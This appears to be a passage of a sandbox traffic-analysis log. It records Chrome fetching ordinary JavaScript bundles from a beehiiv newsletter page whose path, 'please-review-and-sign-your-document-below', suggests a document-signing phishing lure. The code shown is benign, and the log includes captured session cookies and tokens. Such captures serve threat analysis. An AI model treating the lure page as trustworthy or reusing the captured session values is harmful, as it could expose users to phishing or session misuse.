                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 0a 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 24 7b 65 74 7d 20 30 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 37 35 2c 20 30 2e 38 38 35 2c 20 30 2e 33 32 2c 20 31 2e 32 37 35 29 0a 20 20 20 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 31 30 30 6d 73 3b 0a 0a 20 20 26 3a 61 66 74 65 72 2c 0a 20 20 26 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 27 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 24 7b 61 74 7d 20 30 2e 31 35 73 20 65 61 73 65 2d 6f 75 74 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d
                                                                                                                                            Data Ascii: position: relative; transform: rotate(45deg); animation: ${et} 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275) forwards; animation-delay: 100ms; &:after, &:before { content: ''; animation: ${at} 0.15s ease-out forwards; animation-
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 37 35 2c 20 30 2e 38 38 35 2c 20 30 2e 33 32 2c 20 31 2e 32 37 35 29 0a 20 20 20 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 31 30 30 6d 73 3b 0a 20 20 26 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 27 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 24 7b 6c 74 7d 20 30 2e 32 73 20 65 61 73 65 2d 6f 75 74 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 32 30 30 6d 73 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20
                                                                                                                                            Data Ascii: cubic-bezier(0.175, 0.885, 0.32, 1.275) forwards; animation-delay: 100ms; &:after { content: ''; box-sizing: border-box; animation: ${lt} 0.2s ease-out forwards; opacity: 0; animation-delay: 200ms; position: absolute;
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 3b 20 6f 70 61 63 69 74 79 3a 31 3b 7d 0a 31 30 30 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 24 7b 74 2a 2d 31 35 30 7d 25 2c 2d 31 70 78 29 20 73 63 61 6c 65 28 2e 36 29 3b 20 6f 70 61 63 69 74 79 3a 30 3b 7d 0a 60 2c 68 74 3d 22 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 20 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 22 2c 62 74 3d 22 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 7d 20 31 30 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 7d 22 2c 76 74 3d 76 28 22 64 69 76 22 29 60 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 36 33 36 33 36 3b 0a 20 20 6c
                                                                                                                                            Data Ascii: ; opacity:1;}100% {transform: translate3d(0,${t*-150}%,-1px) scale(.6); opacity:0;}`,ht="0%{opacity:0;} 100%{opacity:1;}",bt="0%{opacity:1;} 100%{opacity:0;}",vt=v("div")` display: flex; align-items: center; background: #fff; color: #363636; l
                                                                                                                                            2025-01-15 18:14:34 UTC1297INData Raw: 72 28 69 29 2e 6f 62 73 65 72 76 65 28 6e 2c 7b 73 75 62 74 72 65 65 3a 21 30 2c 63 68 69 6c 64 4c 69 73 74 3a 21 30 2c 63 68 61 72 61 63 74 65 72 44 61 74 61 3a 21 30 7d 29 7d 7d 2c 5b 74 2c 73 5d 29 3b 72 65 74 75 72 6e 20 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 72 65 66 3a 72 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 73 74 79 6c 65 3a 61 7d 2c 6f 29 7d 2c 6b 74 3d 28 74 2c 65 29 3d 3e 7b 6c 65 74 20 61 3d 74 2e 69 6e 63 6c 75 64 65 73 28 22 74 6f 70 22 29 2c 73 3d 61 3f 7b 74 6f 70 3a 30 7d 3a 7b 62 6f 74 74 6f 6d 3a 30 7d 2c 6f 3d 74 2e 69 6e 63 6c 75 64 65 73 28 22 63 65 6e 74 65 72 22 29 3f 7b 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 3a 74 2e 69 6e 63 6c 75 64 65 73 28 22 72 69 67 68 74 22 29
                                                                                                                                            Data Ascii: r(i).observe(n,{subtree:!0,childList:!0,characterData:!0})}},[t,s]);return c.createElement("div",{ref:r,className:e,style:a},o)},kt=(t,e)=>{let a=t.includes("top"),s=a?{top:0}:{bottom:0},o=t.includes("center")?{justifyContent:"center"}:t.includes("right")


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            47192.168.2.1649766104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC557OUTGET /assets/PageProvider-uKxoiNdl.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1569
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"621-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a3af298ce0-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 35 62 38 64 30 38 31 2d 34 32 32 39 2d 35 31 64 30 2d 61 30 36 66 2d 33 63 61 63 66 35 37 30 38 37 32 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f5b8d081-4229-51d0-a06f-3cacf570872c")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1097INData Raw: 6f 6e 73 74 20 66 3d 65 3d 3e 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 20 2f 67 2c 22 2b 22 29 3a 22 22 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 72 29 7b 63 6f 6e 73 74 5b 73 2c 6f 5d 3d 63 2e 75 73 65 53 74 61 74 65 28 28 29 3d 3e 7b 69 66 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3e 22 75 22 29 72 65 74 75 72 6e 20 72 3b 74 72 79 7b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 65 29 3b 72 65 74 75 72 6e 20 74 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 3a 72 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 74 29 2c 72 7d 7d 29 3b 72 65 74 75 72 6e 5b 73 2c 74 3d 3e 7b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e
                                                                                                                                            Data Ascii: onst f=e=>e?e.replace(/ /g,"+"):"";function E(e,r){const[s,o]=c.useState(()=>{if(typeof window>"u")return r;try{const t=window.localStorage.getItem(e);return t?JSON.parse(t):r}catch(t){return console.error(t),r}});return[s,t=>{try{const n=t instanceof Fun


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            48192.168.2.1649767104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC553OUTGET /assets/useToast-DK42uF07.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 608
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"260-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a428c64402-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 64 31 39 33 37 38 30 2d 31 39 32 37 2d 35 38 64 34 2d 39 64 61 61 2d 30 38 65 33 61 65 61 30 35 36 63 38 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ed193780-1927-58d4-9daa-08e3aea056c8")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC135INData Raw: 65 73 73 28 74 29 2c 65 26 26 65 28 29 29 7d 7d 2c 5b 73 5d 29 7d 3b 65 78 70 6f 72 74 7b 70 20 61 73 20 75 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 65 64 31 39 33 37 38 30 2d 31 39 32 37 2d 35 38 64 34 2d 39 64 61 61 2d 30 38 65 33 61 65 61 30 35 36 63 38 0a
                                                                                                                                            Data Ascii: ess(t),e&&e())}},[s])};export{p as u};//# sourceMappingURL=useToast-DK42uF07.js.map//# debugId=ed193780-1927-58d4-9daa-08e3aea056c8


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            49192.168.2.1649768104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC846OUTGET /assets/YoutubeIcon-DSouMQiN.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3850
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"f0a-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a4380fc477-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 31 66 66 39 65 34 33 2d 64 39 63 63 2d 35 30 38 64 2d 38 65 38 65 2d 63 36 34 62 39 64 64 61 32 62 64 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51ff9e43-d9cc-508d-8e8e-c64b9dda2bd2")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 63 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6a 73 78 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 34 20 31 32 2e 30 37 33 63 30 2d 36 2e 36 32 37 2d 35 2e 33 37 33 2d 31 32 2d 31 32 2d 31 32 73 2d 31 32 20 35 2e 33 37 33 2d 31 32 20 31 32 63 30 20 35 2e 39 39 20 34 2e 33 38 38 20 31 30 2e 39 35 34 20 31 30 2e 31 32 35 20 31 31 2e 38 35 34 76 2d 38 2e 33 38 35 48 37 2e 30 37 38 76 2d 33 2e 34 37 68 33 2e 30 34 37 56 39 2e 34 33 63 30 2d 33 2e 30 30 37 20 31 2e 37 39 32 2d 34 2e 36 36 39 20 34 2e 35 33 33 2d 34 2e 36 36 39 20 31 2e 33 31 32 20 30 20 32 2e 36 38 36 2e 32 33 35 20 32 2e 36 38 36 2e 32 33 35 76 32 2e 39 35 33 48 31 35 2e 38 33 63 2d 31 2e 34 39 31 20 30 2d 31 2e 39 35 36 2e 39 32 35 2d 31 2e 39 35 36 20 31 2e 38
                                                                                                                                            Data Ascii: 24 24",fill:c,children:s.jsx("path",{d:"M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.8
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 36 32 7a 6d 30 20 31 30 2e 31 36 32 63 2d 32 2e 32 30 39 20 30 2d 34 2d 31 2e 37 39 2d 34 2d 34 20 30 2d 32 2e 32 30 39 20 31 2e 37 39 31 2d 34 20 34 2d 34 73 34 20 31 2e 37 39 31 20 34 20 34 63 30 20 32 2e 32 31 2d 31 2e 37 39 31 20 34 2d 34 20 34 7a 6d 36 2e 34 30 36 2d 31 31 2e 38 34 35 63 2d 2e 37 39 36 20 30 2d 31 2e 34 34 31 2e 36 34 35 2d 31 2e 34 34 31 20 31 2e 34 34 73 2e 36 34 35 20 31 2e 34 34 20 31 2e 34 34 31 20 31 2e 34 34 63 2e 37 39 35 20 30 20 31 2e 34 33 39 2d 2e 36 34 35 20 31 2e 34 33 39 2d 31 2e 34 34 73 2d 2e 36 34 34 2d 31 2e 34 34 2d 31 2e 34 33 39 2d 31 2e 34 34 7a 22 7d 29 7d 29 2c 68 3d 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 66 69 6c 6c 3a 63 7d 29 3d 3e 73 2e 6a 73 78 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74
                                                                                                                                            Data Ascii: 62zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"})}),h=({className:e,fill:c})=>s.jsx("svg",{className:t
                                                                                                                                            2025-01-15 18:14:35 UTC655INData Raw: 39 20 32 31 2e 37 35 48 31 2e 36 38 6c 37 2e 37 33 2d 38 2e 38 33 35 4c 31 2e 32 35 34 20 32 2e 32 35 48 38 2e 30 38 6c 34 2e 37 31 33 20 36 2e 32 33 31 7a 6d 2d 31 2e 31 36 31 20 31 37 2e 35 32 68 31 2e 38 33 33 4c 37 2e 30 38 34 20 34 2e 31 32 36 48 35 2e 31 31 37 7a 22 7d 29 7d 29 7d 29 2c 6c 3d 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 66 69 6c 6c 3a 63 7d 29 3d 3e 73 2e 6a 73 78 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 28 65 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 22 32 34 22 2c 68 65 69 67 68 74 3a 22 32 34 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 63 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6a 73 78 28 22 70 61
                                                                                                                                            Data Ascii: 9 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"})})}),l=({className:e,fill:c})=>s.jsx("svg",{className:t(e),xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",viewBox:"0 0 24 24",fill:c,children:s.jsx("pa


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            50192.168.2.1649772104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC854OUTGET /assets/use-root-containers-DmyWFwuo.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4057
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"fd9-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a5fd8f8c1b-EWR
